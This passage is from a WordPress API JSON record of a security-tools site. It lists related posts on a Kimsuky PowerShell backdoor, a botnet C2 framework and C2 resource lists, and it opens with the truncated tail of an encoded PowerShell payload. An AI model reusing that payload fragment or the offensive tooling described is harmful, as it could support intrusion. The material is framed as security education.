B4AGkAdAA=}))));Exit | PowerShell - Also Read - Metabigor : Command Line Search Engines Without Any API Key PoC: Payload Execution: Analyze Encrypted Traffic: Download","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":32352,"url":"https:\/\/kalilinuxtutorials.com\/kimsuky-powershell-backdoor-2\/","url_meta":{"origin":24174,"position":2},"title":"Kimsuky PowerShell Backdoor &#8211; A Comprehensive Analysis Of Its Commands And Operations","author":"Varshini","date":"March 18, 2024","format":false,"excerpt":"In the shadowy realms of cyber espionage, the Kimsuky PowerShell Backdoor stands as a sophisticated tool designed for stealthy infiltrations and data exfiltration. This article delves into the intricate workings of its server-client communication, presenting a detailed enumeration and analysis of the backdoor's commands. Through examining these operational intricacies, we\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiuh3q47EjqVWNFub_v7FQfQ_NWd-bjDq0nr0BK7ew7ZAytEKsYSv8RcTZKhuYCyfqr8T7BIc9NLdKqIimQY4AvXGsNDZ7o8Dh3H_FvYO8E48TPvQnJ2r_i5LW7xdCNY_4iW-ym26HLLCKnfoQDfeaj3slk_BrtCSBxMO5ICZL9ZaNYS9nC5SGB5kS_7xfG\/s16000\/StopCrypt%20Ransomware%20%282%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiuh3q47EjqVWNFub_v7FQfQ_NWd-bjDq0nr0BK7ew7ZAytEKsYSv8RcTZKhuYCyfqr8T7BIc9NLdKqIimQY4AvXGsNDZ7o8Dh3H_FvYO8E48TPvQnJ2r_i5LW7xdCNY_4iW-ym26HLLCKnfoQDfeaj3slk_BrtCSBxMO5ICZL9ZaNYS9nC5SGB5kS_7xfG\/s16000\/StopCrypt%20Ransomware%20%282%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiuh3q47EjqVWNFub_v7FQfQ_NWd-bjDq0nr0BK7ew7ZAytEKsYSv8RcTZKhuYCyfqr8T7BIc9NLdKqIimQY4AvXGsNDZ7o8Dh3H_FvYO8E48TPvQnJ2r_i5LW7xdCNY_4iW-ym26HLLCKnfoQDfeaj3slk_BrtCSBxMO5ICZL9ZaNYS9nC5SGB5kS_7xfG\/s16000\/StopCrypt%20Ransomware%20%282%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiuh3q47EjqVWNFub_v7FQfQ_NWd-bjDq0nr0BK7ew7ZAytEKsYSv8RcTZKhuYCyfqr8T7BIc9NLdKqIimQY4AvXGsNDZ7o8Dh3H_FvYO8E48TPvQnJ2r_i5LW7xdCNY_4iW-ym26HLLCKnfoQDfeaj3slk_BrtCSBxMO5ICZL9ZaNYS9nC5SGB5kS_7xfG\/s16000\/StopCrypt%20Ransomware%20%282%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiuh3q47EjqVWNFub_v7FQfQ_NWd-bjDq0nr0BK7ew7ZAytEKsYSv8RcTZKhuYCyfqr8T7BIc9NLdKqIimQY4AvXGsNDZ7o8Dh3H_FvYO8E48TPvQnJ2r_i5LW7xdCNY_4iW-ym26HLLCKnfoQDfeaj3slk_BrtCSBxMO5ICZL9ZaNYS9nC5SGB5kS_7xfG\/s16000\/StopCrypt%20Ransomware%20%282%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiuh3q47EjqVWNFub_v7FQfQ_NWd-bjDq0nr0BK7ew7ZAytEKsYSv8RcTZKhuYCyfqr8T7BIc9NLdKqIimQY4AvXGsNDZ7o8Dh3H_FvYO8E48TPvQnJ2r_i5LW7xdCNY_4iW-ym26HLLCKnfoQDfeaj3slk_BrtCSBxMO5ICZL9ZaNYS9nC5SGB5kS_7xfG\/s16000\/StopCrypt%20Ransomware%20%282%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":32223,"url":"https:\/\/kalilinuxtutorials.com\/kimsuky-powershell-backdoor\/","url_meta":{"origin":24174,"position":3},"title":"Kimsuky PowerShell Backdoor : An In-Depth Breakdown Of Its Command And Control Framework","author":"Varshini","date":"March 8, 2024","format":false,"excerpt":"We delve into the intricate workings of the Kimsuky PowerShell Backdoor, a sophisticated cyber espionage tool attributed to the notorious Kimsuky hacking group. We provide a detailed examination of its command and control (C2) operations, shedding light on the backdoor's capabilities to manipulate, exfiltrate, and manage files and processes on\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjCdlIBfrYRVgyJm3SF2_izyTuzWJ_w-U1qi4Vc2A3dTTgj73bbgIiCKmGDU1k-u5fw9_UGSnvqxVZ6OtIuta1LL0cJ0rQq_kqfvhsMSVDaR8M7jURN-yypfT79g9trN4NRcUT4nUUGa89hJRQXQ7Uh6m1SRAKz7FTj4CrSt4EjIvihPtM27r3O_aM6L-rS\/s16000\/Title%20%281%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjCdlIBfrYRVgyJm3SF2_izyTuzWJ_w-U1qi4Vc2A3dTTgj73bbgIiCKmGDU1k-u5fw9_UGSnvqxVZ6OtIuta1LL0cJ0rQq_kqfvhsMSVDaR8M7jURN-yypfT79g9trN4NRcUT4nUUGa89hJRQXQ7Uh6m1SRAKz7FTj4CrSt4EjIvihPtM27r3O_aM6L-rS\/s16000\/Title%20%281%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjCdlIBfrYRVgyJm3SF2_izyTuzWJ_w-U1qi4Vc2A3dTTgj73bbgIiCKmGDU1k-u5fw9_UGSnvqxVZ6OtIuta1LL0cJ0rQq_kqfvhsMSVDaR8M7jURN-yypfT79g9trN4NRcUT4nUUGa89hJRQXQ7Uh6m1SRAKz7FTj4CrSt4EjIvihPtM27r3O_aM6L-rS\/s16000\/Title%20%281%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjCdlIBfrYRVgyJm3SF2_izyTuzWJ_w-U1qi4Vc2A3dTTgj73bbgIiCKmGDU1k-u5fw9_UGSnvqxVZ6OtIuta1LL0cJ0rQq_kqfvhsMSVDaR8M7jURN-yypfT79g9trN4NRcUT4nUUGa89hJRQXQ7Uh6m1SRAKz7FTj4CrSt4EjIvihPtM27r3O_aM6L-rS\/s16000\/Title%20%281%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjCdlIBfrYRVgyJm3SF2_izyTuzWJ_w-U1qi4Vc2A3dTTgj73bbgIiCKmGDU1k-u5fw9_UGSnvqxVZ6OtIuta1LL0cJ0rQq_kqfvhsMSVDaR8M7jURN-yypfT79g9trN4NRcUT4nUUGa89hJRQXQ7Uh6m1SRAKz7FTj4CrSt4EjIvihPtM27r3O_aM6L-rS\/s16000\/Title%20%281%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjCdlIBfrYRVgyJm3SF2_izyTuzWJ_w-U1qi4Vc2A3dTTgj73bbgIiCKmGDU1k-u5fw9_UGSnvqxVZ6OtIuta1LL0cJ0rQq_kqfvhsMSVDaR8M7jURN-yypfT79g9trN4NRcUT4nUUGa89hJRQXQ7Uh6m1SRAKz7FTj4CrSt4EjIvihPtM27r3O_aM6L-rS\/s16000\/Title%20%281%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":6594,"url":"https:\/\/kalilinuxtutorials.com\/aura-botnet-django-based-c2-server\/","url_meta":{"origin":24174,"position":4},"title":"Aura Botnet : A Super Portable Botnet Framework With A Django-Based C2 Server","author":"R K","date":"September 23, 2019","format":false,"excerpt":"Aura Botnet is a super portable botnet framework with a Django-based C2 server. The client is written in C++, with alternate clients written in Rust, Bash, and Powershell. The botnet's C2 server utilizes the Django framework as the backend. It is far from the most efficient web server, but this\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":30608,"url":"https:\/\/kalilinuxtutorials.com\/awesome-command-and-control\/","url_meta":{"origin":24174,"position":5},"title":"Awesome Command And Control","author":"Varshini","date":"October 4, 2023","format":false,"excerpt":"A collection of awesome Command & Control (C2) frameworks, tools and resources for post-exploitation and red teaming assessments. If you'd like to\u00a0contribute\u00a0to this list, simply open a PR with your additions. Maintained by\u00a0@tcostam. If you have contributions but can't pull request, give me a shout at twitter. Table Of Contents\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhc8vcyb8ZLSimS20xiQLPU-c5s6BGpapTb2JjRZItKLqcyKzkOujWOraWQz91OYA4luq2tciF14CKi1kVByxILh-uHYEnwAPXLeJLzA20qxvdIwAKaVqTP3QWwDkOz9rRcbIYVSWh8-7nELAGXpqDgIUm77Bs7SCQl_9Lx5qD1MfpIq-p485Lecx5_aj3B\/s16000\/Untitled%20design%20%2814%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhc8vcyb8ZLSimS20xiQLPU-c5s6BGpapTb2JjRZItKLqcyKzkOujWOraWQz91OYA4luq2tciF14CKi1kVByxILh-uHYEnwAPXLeJLzA20qxvdIwAKaVqTP3QWwDkOz9rRcbIYVSWh8-7nELAGXpqDgIUm77Bs7SCQl_9Lx5qD1MfpIq-p485Lecx5_aj3B\/s16000\/Untitled%20design%20%2814%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhc8vcyb8ZLSimS20xiQLPU-c5s6BGpapTb2JjRZItKLqcyKzkOujWOraWQz91OYA4luq2tciF14CKi1kVByxILh-uHYEnwAPXLeJLzA20qxvdIwAKaVqTP3QWwDkOz9rRcbIYVSWh8-7nELAGXpqDgIUm77Bs7SCQl_9Lx5qD1MfpIq-p485Lecx5_aj3B\/s16000\/Untitled%20design%20%2814%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhc8vcyb8ZLSimS20xiQLPU-c5s6BGpapTb2JjRZItKLqcyKzkOujWOraWQz91OYA4luq2tciF14CKi1kVByxILh-uHYEnwAPXLeJLzA20qxvdIwAKaVqTP3QWwDkOz9rRcbIYVSWh8-7nELAGXpqDgIUm77Bs7SCQl_9Lx5qD1MfpIq-p485Lecx5_aj3B\/s16000\/Untitled%20design%20%2814%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhc8vcyb8ZLSimS20xiQLPU-c5s6BGpapTb2JjRZItKLqcyKzkOujWOraWQz91OYA4luq2tciF14CKi1kVByxILh-uHYEnwAPXLeJLzA20qxvdIwAKaVqTP3QWwDkOz9rRcbIYVSWh8-7nELAGXpqDgIUm77Bs7SCQl_9Lx5qD1MfpIq-p485Lecx5_aj3B\/s16000\/Untitled%20design%20%2814%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhc8vcyb8ZLSimS20xiQLPU-c5s6BGpapTb2JjRZItKLqcyKzkOujWOraWQz91OYA4luq2tciF14CKi1kVByxILh-uHYEnwAPXLeJLzA20qxvdIwAKaVqTP3QWwDkOz9rRcbIYVSWh8-7nELAGXpqDgIUm77Bs7SCQl_9Lx5qD1MfpIq-p485Lecx5_aj3B\/s16000\/Untitled%20design%20%2814%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/24174","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=24174"}],"version-history":[{"count":7,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/24174\/revisions"}],"predecessor-version":[{"id":24181,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/24174\/revisions\/24181"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/24182"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=24174"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=24174"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=24174"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}